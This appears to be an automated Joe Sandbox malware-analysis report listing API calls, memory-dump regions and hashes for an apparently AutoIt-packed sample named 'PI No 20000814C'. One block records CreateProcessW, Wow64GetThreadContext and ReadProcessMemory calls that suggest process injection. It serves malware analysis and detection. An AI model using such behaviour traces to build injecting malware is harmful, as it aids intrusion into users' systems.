                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Temp$FileNamePath
                                    • String ID: aut
                                    • API String ID: 3285503233-3010740371
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    APIs
                                      • Part of subcall function 00F203A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F203D3
                                      • Part of subcall function 00F203A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00F203DB
                                      • Part of subcall function 00F203A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F203E6
                                      • Part of subcall function 00F203A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F203F1
                                      • Part of subcall function 00F203A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00F203F9
                                      • Part of subcall function 00F203A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00F20401
                                      • Part of subcall function 00F16259: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00F162B4
                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F0FB2D
                                    • OleInitialize.OLE32(00000000), ref: 00F0FBAA
                                    • CloseHandle.KERNEL32(00000000), ref: 00F449F2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
                                    • String ID:
                                    • API String ID: 3094916012-0
                                    APIs
                                    • _memset.LIBCMT ref: 00F04401
                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F044A6
                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F044C3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell_$_memset
                                    • String ID:
                                    • API String ID: 1505330794-0
                                    APIs
                                    • __FF_MSGBANNER.LIBCMT ref: 00F25963
                                      • Part of subcall function 00F2A3AB: __NMSG_WRITE.LIBCMT ref: 00F2A3D2
                                      • Part of subcall function 00F2A3AB: __NMSG_WRITE.LIBCMT ref: 00F2A3DC
                                    • __NMSG_WRITE.LIBCMT ref: 00F2596A
                                      • Part of subcall function 00F2A408: GetModuleFileNameW.KERNEL32(00000000,00FC43BA,00000104,00000000,00000001,00000000), ref: 00F2A49A
                                      • Part of subcall function 00F2A408: ___crtMessageBoxW.LIBCMT ref: 00F2A548
                                      • Part of subcall function 00F232DF: ___crtCorExitProcess.LIBCMT ref: 00F232E5
                                      • Part of subcall function 00F232DF: ExitProcess.KERNEL32 ref: 00F232EE
                                      • Part of subcall function 00F28D68: __getptd_noexit.LIBCMT ref: 00F28D68
                                    • RtlAllocateHeap.NTDLL(01970000,00000000,00000001), ref: 00F2598F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                    • String ID:
                                    • API String ID: 1372826849-0
                                    APIs
                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00F697D2,?,?,?,?,?,00000004), ref: 00F69B45
                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00F697D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00F69B5B
                                    • CloseHandle.KERNEL32(00000000,?,00F697D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F69B62
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: File$CloseCreateHandleTime
                                    • String ID:
                                    • API String ID: 3397143404-0
                                    APIs
                                    • _free.LIBCMT ref: 00F68FA5
                                      • Part of subcall function 00F22F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00F29C64), ref: 00F22FA9
                                      • Part of subcall function 00F22F95: GetLastError.KERNEL32(00000000,?,00F29C64), ref: 00F22FBB
                                    • _free.LIBCMT ref: 00F68FB6
                                    • _free.LIBCMT ref: 00F68FC8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Similarity
                                    • API ID:
                                    • String ID: CALL
                                    • API String ID: 0-4196123274
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Similarity
                                    • API ID: _memmove
                                    • String ID: EA06
                                    • API String ID: 4104443479-3962188686
                                    APIs
                                    • 74A3C8D0.UXTHEME ref: 00F04992
                                      • Part of subcall function 00F235AC: __lock.LIBCMT ref: 00F235B2
                                      • Part of subcall function 00F235AC: RtlDecodePointer.NTDLL(00000001), ref: 00F235BE
                                      • Part of subcall function 00F235AC: RtlEncodePointer.NTDLL(?), ref: 00F235C9
                                      • Part of subcall function 00F04A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00F04A73
                                      • Part of subcall function 00F04A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F04A88
                                      • Part of subcall function 00F03B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F03B7A
                                      • Part of subcall function 00F03B4C: IsDebuggerPresent.KERNEL32 ref: 00F03B8C
                                      • Part of subcall function 00F03B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00FC62F8,00FC62E0,?,?), ref: 00F03BFD
                                      • Part of subcall function 00F03B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00F03C81
                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F049D2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Similarity
                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$DebuggerDecodeEncodeFullNamePathPresent__lock
                                    • String ID:
                                    • API String ID: 2688871447-0
                                    APIs
                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00F05981,?,?,?,?), ref: 00F05E27
                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00F05981,?,?,?,?), ref: 00F3E19C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Similarity
                                    • API ID: __lock_file_memset
                                    • String ID:
                                    • API String ID: 26237723-0
                                    APIs
                                      • Part of subcall function 00F28D68: __getptd_noexit.LIBCMT ref: 00F28D68
                                    • __lock_file.LIBCMT ref: 00F2561B
                                      • Part of subcall function 00F26E4E: __lock.LIBCMT ref: 00F26E71
                                    • __fclose_nolock.LIBCMT ref: 00F25626
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Similarity
                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                    • String ID:
                                    • API String ID: 2800547568-0
                                    APIs
                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 018E1ABB
                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 018E1B51
                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 018E1B73
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2081259592.00000000018E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_18e0000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                    • String ID:
                                    • API String ID: 2438371351-0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Similarity
                                    • API ID: _memmove
                                    • String ID:
                                    • API String ID: 4104443479-0
                                    APIs
                                    • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00F05CF6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID:
                                    • API String ID: 973152223-0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Similarity
                                    • API ID: ClearVariant
                                    • String ID:
                                    • API String ID: 1473721057-0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Similarity
                                    • API ID: _memmove
                                    • String ID:
                                    • API String ID: 4104443479-0
                                    APIs
                                      • Part of subcall function 00F04D13: FreeLibrary.KERNEL32(00000000,?), ref: 00F04D4D
                                      • Part of subcall function 00F2548B: __wfsopen.LIBCMT ref: 00F25496
                                    • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00FC62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F04F6F
                                      • Part of subcall function 00F04CC8: FreeLibrary.KERNEL32(00000000), ref: 00F04D02
                                      • Part of subcall function 00F04DD0: _memmove.LIBCMT ref: 00F04E1A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Library$Free$Load__wfsopen_memmove
                                    • String ID:
                                    • API String ID: 1396898556-0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Similarity
                                    • API ID: ClearVariant
                                    • String ID:
                                    • API String ID: 1473721057-0
                                    • Opcode ID: 68ef92a118c79125aa92ace748382c3543b10b106b867d80f8c1d61f9ed4ed0c
                                    • Instruction ID: 031fa6ec8dbe89ecfafb31c465a1fb83ca431bc2a3dccec3a85e29425af2f928
                                    • Opcode Fuzzy Hash: 68ef92a118c79125aa92ace748382c3543b10b106b867d80f8c1d61f9ed4ed0c
                                    • Instruction Fuzzy Hash: 03212474A08351CFCB14DF24C844B5ABBE0BF88314F048968E98A577A2D735E849EB52
                                    APIs
                                    • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00F05807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00F05D76
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: FileRead
                                    • String ID:
                                    • API String ID: 2738559852-0
                                    • Opcode ID: 52d52d06aa4ba30d8aaba67cbe081c43e1a70e7af449f5280c41ce4421a88187
                                    • Instruction ID: 50da7834b7e87f31ecc4315e3d0f48ef562ce6226b027912c5a68c07057fbbd1
                                    • Opcode Fuzzy Hash: 52d52d06aa4ba30d8aaba67cbe081c43e1a70e7af449f5280c41ce4421a88187
                                    • Instruction Fuzzy Hash: 9F113D31605B059FD7308F15C444B63B7E9EF45B60F10C92EE8AA86690D7B0E945EF60
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _memmove
                                    • String ID:
                                    • API String ID: 4104443479-0
                                    • Opcode ID: 327c95574f60e5010daba2857bec39af6c2e223ed2d997c94b99b88fa264bf6e
                                    • Instruction ID: 2d427747e3dfe350655b18720fe2b2fd2fb6bb39820649d8000d5cf7489faf40
                                    • Opcode Fuzzy Hash: 327c95574f60e5010daba2857bec39af6c2e223ed2d997c94b99b88fa264bf6e
                                    • Instruction Fuzzy Hash: 96017CB9600942ABC305EB29D851D26FBA9FF8A3147148159E829C7742DB74EC21DBE0
                                    APIs
                                    • __lock_file.LIBCMT ref: 00F24AD6
                                      • Part of subcall function 00F28D68: __getptd_noexit.LIBCMT ref: 00F28D68
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: __getptd_noexit__lock_file
                                    • String ID:
                                    • API String ID: 2597487223-0
                                    • Opcode ID: 7ee46a184d4c22b8d26600b44d7b2ee5b2681c46e234783ca3c4cad049f3581a
                                    • Instruction ID: 2b7f85e2a0bf525014b9269b188065ea2fc00ae48bfec90c235e8fa301e66e79
                                    • Opcode Fuzzy Hash: 7ee46a184d4c22b8d26600b44d7b2ee5b2681c46e234783ca3c4cad049f3581a
                                    • Instruction Fuzzy Hash: FDF0AF31942229ABDF61AF64EC0639F36A1AF40365F048518F424AA1D1CBBC9A51FF55
                                    APIs
                                    • FreeLibrary.KERNEL32(?,?,00FC62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F04FDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID:
                                    • API String ID: 3664257935-0
                                    • Opcode ID: 4b24cdb214c8fe352fb3f03f581f7a79429acc890596374e7b41c71727f7dda3
                                    • Instruction ID: 0c2e9cc8752f5ec0571efcba01d139132d01879f419fb95fa5933dd67c086595
                                    • Opcode Fuzzy Hash: 4b24cdb214c8fe352fb3f03f581f7a79429acc890596374e7b41c71727f7dda3
                                    • Instruction Fuzzy Hash: 65F030B1505712CFC7349F64E494852BBE1BF0432A3248A3EE2D683650C731B844FF40
                                    APIs
                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F209F4
                                      • Part of subcall function 00F07D2C: _memmove.LIBCMT ref: 00F07D66
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: LongNamePath_memmove
                                    • String ID:
                                    • API String ID: 2514874351-0
                                    • Opcode ID: 3eb785bbc7a286284dee15c3fa15d7d4529f77c3b427697e280b1f5763512b52
                                    • Instruction ID: 9308cd6a07b6d364ce8d04747be9876f134225370265cad5ed19f4c55a8e1c9a
                                    • Opcode Fuzzy Hash: 3eb785bbc7a286284dee15c3fa15d7d4529f77c3b427697e280b1f5763512b52
                                    • Instruction Fuzzy Hash: 42E086369052285BC720E6589C05FFAB7ADDFC87A0F0401B5FC0CD7244D964AC819690
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: __fread_nolock
                                    • String ID:
                                    • API String ID: 2638373210-0
                                    • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                    • Instruction ID: 58171dff112913a77e28ae31dd980efcb81baf52daf0ea8ec67695ecb4fdda10
                                    • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                    • Instruction Fuzzy Hash: 53E092B0508B005FDB348A24D8107E373E4EB06325F00081CF2AA83341EBA2B841DB59
                                    APIs
                                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00F3E16B,?,?,00000000), ref: 00F05DBF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID:
                                    • API String ID: 973152223-0
                                    • Opcode ID: 5a5cebbd5bf5a63ac516fefa4b480735d40dfb6d66d7d72b16910bb73d583852
                                    • Instruction ID: b478f277ada195bd5fbb7b1ba231f775b84c98e09290da15ed7d7964b4f48cff
                                    • Opcode Fuzzy Hash: 5a5cebbd5bf5a63ac516fefa4b480735d40dfb6d66d7d72b16910bb73d583852
                                    • Instruction Fuzzy Hash: F1D0C77464020CBFE710DB80DC46FA9777CD705710F200194FD0456290D6B27D549795
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: __wfsopen
                                    • String ID:
                                    • API String ID: 197181222-0
                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                    • Instruction ID: d1af64464abb21aa55d7b5539bdf214aced1a2ee34909c5e4836307a754bc328
                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                    • Instruction Fuzzy Hash: 38B0927684020C77DE012E82FC12A697B199B44A78F808020FB0C1C162A677A6A0A689
                                    APIs
                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00F4221A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: PathTemp
                                    • String ID:
                                    • API String ID: 2920410445-0
                                    • Opcode ID: 80540b7369705beb2c4ecc4ccb8977e21dd2ba6855a1c776c033c12e5c887ca0
                                    • Instruction ID: 6aad610b463552bc931a29650237fbf337f4fa69d9f71490dad74bd92de5e219
                                    • Opcode Fuzzy Hash: 80540b7369705beb2c4ecc4ccb8977e21dd2ba6855a1c776c033c12e5c887ca0
                                    • Instruction Fuzzy Hash: 4EC0487286402A9FEB19AB50DCA5AB8762CFF10701F1040E5B64695091AAB46B84EF21
                                    APIs
                                    • GetLastError.KERNEL32(00000002,00000000), ref: 00F6D46A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ErrorLast
                                    • String ID:
                                    • API String ID: 1452528299-0
                                    • Opcode ID: e8ceba9d9841e652be6cf62305f3b7dfeabcdb709095842706155690604c834c
                                    • Instruction ID: 20ffa587986e5e26b94e3648daa993215dcecebb27c1ae452afb8eb20629d268
                                    • Opcode Fuzzy Hash: e8ceba9d9841e652be6cf62305f3b7dfeabcdb709095842706155690604c834c
                                    • Instruction Fuzzy Hash: 63716331B083018FC714EF24C891A6AB7E0AF88714F04456DF8968B2E2DF74ED49EB52
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
